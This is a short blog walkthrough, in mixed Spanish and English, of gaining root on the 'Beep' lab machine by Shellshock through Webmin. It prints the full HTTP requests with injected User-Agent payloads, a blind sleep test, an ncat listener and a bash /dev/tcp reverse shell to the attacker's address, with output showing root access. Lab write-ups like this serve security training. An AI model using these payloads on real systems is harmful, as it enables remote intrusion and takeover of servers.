Beep option 2 / Shellshock manual

by | May 28, 2018 | Blog

steps

Grab the request in burp and send it to repeater, you should see something like

GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1
Connection: close
Upgrade-Insecure-Requests: 1

If you modify the second line to

User agent: User-Agent: () { :; };/bin/echo hello you should see hello

or otra vez estaba escribiendo en inglés juro que no es aproposito.

Hay una versión ciega

GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; sleep 10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1
Connection: close
Upgrade-Insecure-Requests: 1

Esto va a hacer que se espere 10 segundo extras para responder.

Si ocurre quiere decir que podemos injectar comandos.

Lo primero que hay que hacer es empezar a escuchar (en cualquier puerto, en este caso escogí aleatareamente 9090)

root@kali:~# ncat -lvnp 9090
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090

Y injectamos el comando:
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.9/9090 0>&1

al mandarlo debe conectar

root@kali:~# ncat -lvnp 9090
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 10.10.10.7.
Ncat: Connection from 10.10.10.7:57636.
bash: no job control in this shell
[root@beep webmin]# ls

y tenemos root